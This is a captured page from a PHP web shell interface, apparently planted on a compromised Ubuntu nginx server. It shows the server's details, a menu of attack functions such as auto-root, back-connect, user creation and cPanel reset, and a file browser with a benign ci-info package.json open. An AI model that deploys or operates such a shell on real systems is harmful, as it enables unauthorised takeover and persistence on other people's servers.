Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
ci-info /
[ HOME SHELL ]
Name
Size
Permission
Action
CHANGELOG.md
5.12
KB
-rw-rw-rw-
LICENSE
1.06
KB
-rw-rw-rw-
README.md
7.82
KB
-rw-rw-rw-
index.d.ts
2.55
KB
-rw-rw-rw-
index.js
2.31
KB
-rw-rw-rw-
package.json
1023
B
-rw-rw-rw-
vendors.json
5.59
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "ci-info", "version": "3.9.0", "description": "Get details about the current Continuous Integration environment", "main": "index.js", "typings": "index.d.ts", "author": "Thomas Watson Steen <w@tson.dk> (https://twitter.com/wa7son)", "license": "MIT", "repository": "https://github.com/watson/ci-info.git", "bugs": "https://github.com/watson/ci-info/issues", "homepage": "https://github.com/watson/ci-info", "keywords": [ "ci", "continuous", "integration", "test", "detect" ], "files": [ "vendors.json", "index.js", "index.d.ts", "CHANGELOG.md" ], "funding": [ { "type": "github", "url": "https://github.com/sponsors/sibiraj-s" } ], "scripts": { "lint:fix": "standard --fix", "test": "standard && node test.js", "prepare": "husky install" }, "devDependencies": { "clear-module": "^4.1.2", "husky": "^8.0.3", "standard": "^17.1.0", "tape": "^5.7.0" }, "engines": { "node": ">=8" } }
Close